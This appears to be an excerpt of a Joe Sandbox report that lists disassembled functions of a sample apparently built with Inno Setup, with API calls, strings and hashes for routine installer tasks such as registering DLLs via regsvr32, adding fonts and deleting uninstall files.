                                                                                      • Opcode Fuzzy Hash: 8feb52f6250f747c5a664b1527b2b5cd8d32300bfcf5c1eaa96ed0b76df53d0f
                                                                                      • Instruction Fuzzy Hash: 6F31C434F002259ADB10EFB999467EEB2E09F04305F50813BB548EB382DA7C8E01979D
                                                                                      Function 0045DFD8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetMalloc.SHELL32(?), ref: 0045E013
                                                                                      • GetActiveWindow.USER32 ref: 0045E077
                                                                                      • CoInitialize.OLE32(00000000), ref: 0045E08B
                                                                                      • SHBrowseForFolder.SHELL32(?), ref: 0045E0A2
                                                                                      • 76C9D120.OLE32(0045E0E3,00000000,?,?,?,?,?,00000000,0045E167), ref: 0045E0B7
                                                                                      • SetActiveWindow.USER32(?,0045E0E3,00000000,?,?,?,?,?,00000000,0045E167), ref: 0045E0CD
                                                                                      • SetActiveWindow.USER32(?,?,0045E0E3,00000000,?,?,?,?,?,00000000,0045E167), ref: 0045E0D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
                                                                                      • String ID: A
                                                                                      • API String ID: 2698730301-3554254475
                                                                                      • Opcode ID: 4c93aed7974da8df2999b89a302ce796433789b5a6ec67c560a89b0d32607bd6
                                                                                      • Instruction ID: 6bfd7eabbe9e682b3dde037a987c9ea474e9b057d6f32f0a8e83a6328ca7ae7b
                                                                                      • Opcode Fuzzy Hash: 4c93aed7974da8df2999b89a302ce796433789b5a6ec67c560a89b0d32607bd6
                                                                                      • Instruction Fuzzy Hash: D0314471D00218AFDB04EFA6E886A9EBBF8EF09704F51447AF804E7252D7785A04CF59
                                                                                      Function 00418BC4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32(0000000E), ref: 00418BE0
                                                                                      • GetSystemMetrics.USER32(0000000D), ref: 00418BE8
                                                                                      • 6F552980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418BEE
                                                                                        • Part of subcall function 00409920: 6F54C400.COMCTL32((fI,000000FF,00000000,00418C1C,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00409924
                                                                                      • 6F5BCB00.COMCTL32((fI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C3E
                                                                                      • 6F5BC740.COMCTL32(00000000,?,(fI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418C49
                                                                                      • 6F5BCB00.COMCTL32((fI,00000001,?,?,00000000,?,(fI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000), ref: 00418C5C
                                                                                      • 6F550860.COMCTL32((fI,00418C7F,?,00000000,?,(fI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E), ref: 00418C72
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$C400C740F550860F552980
                                                                                      • String ID: (fI
                                                                                      • API String ID: 1828538299-4122540895
                                                                                      • Opcode ID: 65e0913070e1a46d1e4049ee6121461fcfbb365fe4eb4b9520eb625876ba3720
                                                                                      • Instruction ID: ebdf7d90a3a22d50ab8fd643d9f8c48181b88e499e337cf830e96f2c39c8652b
                                                                                      • Opcode Fuzzy Hash: 65e0913070e1a46d1e4049ee6121461fcfbb365fe4eb4b9520eb625876ba3720
                                                                                      • Instruction Fuzzy Hash: 19113675744204BADB50EBF5DC82F5E77B8DB48704F50406AB604E72D2E6799D408768
                                                                                      Function 0045B990 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045B999
                                                                                      • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045B9A9
                                                                                      • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045B9B9
                                                                                      • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045B9C9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                      • API String ID: 190572456-3516654456
                                                                                      • Opcode ID: cdec3d2289940290433f74bcfb90cd33ccdd8b1be43608ea6e51ef040730019a
                                                                                      • Instruction ID: 02f39ce5c28d2ed3ade6aba6a28faafd9b0cc1bc692c698d2602f952355582ec
                                                                                      • Opcode Fuzzy Hash: cdec3d2289940290433f74bcfb90cd33ccdd8b1be43608ea6e51ef040730019a
                                                                                      • Instruction Fuzzy Hash: 020121B0518300DADB24DF379C81B263695E764356F14893BA944552A2D77C0549EBDC
                                                                                      Function 0041A84C Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041A929
                                                                                      • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A963
                                                                                      • SetBkColor.GDI32(?,?), ref: 0041A978
                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041A9C2
                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041A9CD
                                                                                      • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041A9DD
                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AA1C
                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AA26
                                                                                      • SetBkColor.GDI32(00000000,?), ref: 0041AA33
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$StretchText
                                                                                      • String ID:
                                                                                      • API String ID: 2984075790-0
                                                                                      • Opcode ID: 70494902a934abd88d8421d1aeec792968b072de73e514355a54ff46ed356d3f
                                                                                      • Instruction ID: 69ae49bf6c4e82acacdff2fe07525d2a8d99776db7c40e28fbb8516f53671917
                                                                                      • Opcode Fuzzy Hash: 70494902a934abd88d8421d1aeec792968b072de73e514355a54ff46ed356d3f
                                                                                      • Instruction Fuzzy Hash: B461D6B5A00505EFCB40EFA9D985E9AB7F8EF48314B14816AF518DB252C734ED41CF58
                                                                                      Function 00456334 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004564E8,?, /s ",?,regsvr32.exe",?,004564E8), ref: 0045645A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDirectoryHandleSystem
                                                                                      • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                      • API String ID: 2051275411-1862435767
                                                                                      • Opcode ID: edf60017c2564d3275548d2cadab5662920130db2b9ae15ca25aa1c268591cd9
                                                                                      • Instruction ID: 0727363c7f1249558044398805bdccd0d7d16a74982410126c53be3864fdc62d
                                                                                      • Opcode Fuzzy Hash: edf60017c2564d3275548d2cadab5662920130db2b9ae15ca25aa1c268591cd9
                                                                                      • Instruction Fuzzy Hash: 1B41E570E403086BDB10EFD5D881B9DB7F9AF49305F91407BA904BB296D7789A09CB1D
                                                                                      Function 0044CBAC Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 0044CBDD
                                                                                      • GetSysColor.USER32(00000014), ref: 0044CBE4
                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044CBFC
                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CC25
                                                                                      • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CC2F
                                                                                      • GetSysColor.USER32(00000010), ref: 0044CC36
                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044CC4E
                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CC77
                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CCA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$Color$Draw$OffsetRect
                                                                                      • String ID:
                                                                                      • API String ID: 1005981011-0
                                                                                      • Opcode ID: 123d1c78d96388b48013e2d686bd4fbc3c46f036129ba804cfc4942d94a5bc27
                                                                                      • Instruction ID: 1caa52e0a57a24b19c6a51c3cca57839e66ec70a0d40fc0ec19372c69ab55c34
                                                                                      • Opcode Fuzzy Hash: 123d1c78d96388b48013e2d686bd4fbc3c46f036129ba804cfc4942d94a5bc27
                                                                                      • Instruction Fuzzy Hash: 1D21CFB42015007FC710FB2ACD8AE9BBBECDF19319B05457A7958EB3A3C678DD408669
                                                                                      Function 00452814 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004528FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]$o1I
                                                                                      • API String ID: 390214022-2878587892
                                                                                      • Opcode ID: 180da5cb8003d792c816aeea415edf5bd33e2b8e779ba911190ea486055d5340
                                                                                      • Instruction ID: cc9533ecac0167aba3f68936dda73933724a2a20dcf6fda83704f45a3cd3408f
                                                                                      • Opcode Fuzzy Hash: 180da5cb8003d792c816aeea415edf5bd33e2b8e779ba911190ea486055d5340
                                                                                      • Instruction Fuzzy Hash: C1912274A002099BDB11EFA5D982BDEB7B5EF49305F508067E800B7392D7B86E09CB59
                                                                                      Function 00490C88 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00450088: SetEndOfFile.KERNEL32(?,?,0045AA1E,00000000,0045ABA9,?,00000000,00000002,00000002), ref: 0045008F
                                                                                        • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00496628,00492DAD,00000000,00492E02,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00490D19
                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00490D2D
                                                                                      • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00490D47
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00490D53
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00490D59
                                                                                      • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00490D6C
                                                                                      Strings
                                                                                      • Deleting Uninstall data files., xrefs: 00490C8F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                      • String ID: Deleting Uninstall data files.
                                                                                      • API String ID: 1570157960-2568741658
                                                                                      • Opcode ID: f2578554030a24c7267b533a633fac1857f9ff088767cb74f3f53633749f6caa
                                                                                      • Instruction ID: fe893ce7c7fc4f02ce2c16f04c74f522583f7d0dd1eba0bd56840a119b19c503
                                                                                      • Opcode Fuzzy Hash: f2578554030a24c7267b533a633fac1857f9ff088767cb74f3f53633749f6caa
                                                                                      • Instruction Fuzzy Hash: 2A217371358240AEEB10A7A6EC42B273B9CDB54318F50063BF5049B2E3DA7CAC44D76D
                                                                                      Function 0046C118 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046C215,?,?,?,?,00000000), ref: 0046C17F
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046C215), ref: 0046C196
                                                                                      • AddFontResourceA.GDI32(00000000), ref: 0046C1B3
                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046C1C7
                                                                                      Strings
                                                                                      • Failed to open Fonts registry key., xrefs: 0046C19D
                                                                                      • Failed to set value in Fonts registry key., xrefs: 0046C188
                                                                                      • AddFontResource, xrefs: 0046C1D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                      • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                      • API String ID: 955540645-649663873
                                                                                      • Opcode ID: d0cfe69457fce7bbbc28504f119b2d4c3be8b6de6538d31fc16afe2da0dcfddb
                                                                                      • Instruction ID: 8ea992291a1dd30632b8682880332e8f2f5ba9678f4ac26e890d70cee17ca1cd
                                                                                      • Opcode Fuzzy Hash: d0cfe69457fce7bbbc28504f119b2d4c3be8b6de6538d31fc16afe2da0dcfddb
                                                                                      • Instruction Fuzzy Hash: 8221E570B402047AE710EAA68C92F7A639CDB45748F504477BD40EB2C2E67C9D05966E
                                                                                      Function 0045F6E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00416380: GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                                        • Part of subcall function 00416380: UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                                        • Part of subcall function 00416380: RegisterClassA.USER32(?), ref: 0041643E
                                                                                      • GetVersion.KERNEL32 ref: 0045F718
                                                                                      • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0045F756
                                                                                      • SHGetFileInfo.SHELL32(0045F7F4,00000000,?,00000160,00004011), ref: 0045F773
                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0045F791
                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,0045F7F4,00000000,?,00000160,00004011), ref: 0045F797
                                                                                      • SetCursor.USER32(?,0045F7D7,00007F02,0045F7F4,00000000,?,00000160,00004011), ref: 0045F7CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                      • String ID: Explorer
                                                                                      • API String ID: 2594429197-512347832
                                                                                      • Opcode ID: e3239e46c257503266597b56140d29e20775804faaf584886ec342b17592225d
                                                                                      • Instruction ID: 7ff7faf5247c26d25335c70635a1860a407a0e5f323aeaa6378cd2fc5b7ea516
                                                                                      • Opcode Fuzzy Hash: e3239e46c257503266597b56140d29e20775804faaf584886ec342b17592225d
                                                                                      • Instruction Fuzzy Hash: B121E7317403046BE710BBB98C47F9A76989B09709F4144BFBB05EA6C3DA7C9C09866D
                                                                                      Function 00458518 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,0045869A,?,00000000,00000000,00000000,?,00000006,?,00000000,00491FBA,?,00000000,0049205D), ref: 004585DE
                                                                                        • Part of subcall function 00452EB8: FindClose.KERNEL32(000000FF,00452FAE), ref: 00452F9D
                                                                                      Strings
                                                                                      • Failed to delete directory (%d). Will retry later., xrefs: 004585F7
                                                                                      • Failed to delete directory (%d)., xrefs: 00458674
                                                                                      • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00458653
                                                                                      • Failed to strip read-only attribute., xrefs: 004585AC
                                                                                      • Deleting directory: %s, xrefs: 00458567
                                                                                      • Stripped read-only attribute., xrefs: 004585A0
                                                                                      • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004585B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorFindLast
                                                                                      • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                      • API String ID: 754982922-1448842058
                                                                                      • Opcode ID: d02289ac0552954b959a3ec27135d6527882d3cbb7a983ba8985732d5b1c3507
                                                                                      • Instruction ID: dd70d7a7e9406b9190765920557ab5b8ad56b684bc2d1b190e3df41212a100e3
                                                                                      • Opcode Fuzzy Hash: d02289ac0552954b959a3ec27135d6527882d3cbb7a983ba8985732d5b1c3507
                                                                                      • Instruction Fuzzy Hash: 3B418630B042489BCB10DB6988427AE76E59B8930AF55857FAC05B7393DF7C890D8B5A
                                                                                      Function 00422DC0 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCapture.USER32 ref: 00422E14
                                                                                      • GetCapture.USER32 ref: 00422E23
                                                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422E29
                                                                                      • ReleaseCapture.USER32 ref: 00422E2E
                                                                                      • GetActiveWindow.USER32 ref: 00422E3D
                                                                                      • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422EBC
                                                                                      • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422F20
                                                                                      • GetActiveWindow.USER32 ref: 00422F2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                      • String ID:
                                                                                      • API String ID: 862346643-0
                                                                                      • Opcode ID: 8d225d8a55f9a88f292a2c30a551b716c13a14df50b62869e123561c13ee422b
                                                                                      • Instruction ID: 3dc7d5c5dffcbd9cfc95175fcc265abaf37585ce791e678acf2218af3f88607c
                                                                                      • Opcode Fuzzy Hash: 8d225d8a55f9a88f292a2c30a551b716c13a14df50b62869e123561c13ee422b
                                                                                      • Instruction Fuzzy Hash: 19416270B00244AFDB50EBA9DA42B9E77F1EF04304F5540BAF404AB3A2D7B99E40DB18
                                                                                      Function 004293F0 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000), ref: 004293FA
                                                                                      • GetTextMetricsA.GDI32(00000000), ref: 00429403
                                                                                        • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00429412
                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 0042941F
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00429426
                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042942E
                                                                                      • GetSystemMetrics.USER32(00000006), ref: 00429453
                                                                                      • GetSystemMetrics.USER32(00000006), ref: 0042946D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                      • String ID:
                                                                                      • API String ID: 361401722-0
                                                                                      • Opcode ID: aa0e22ae2bb85fef1fe3d4d4a9dea72362df36d5d975f8d53732e0b8776d61f5
                                                                                      • Instruction ID: 6143225b0a8ca3b977d6363335e7cd80f7f8ea5cda66b8f0fa851fdc2eb08b32
                                                                                      • Opcode Fuzzy Hash: aa0e22ae2bb85fef1fe3d4d4a9dea72362df36d5d975f8d53732e0b8776d61f5
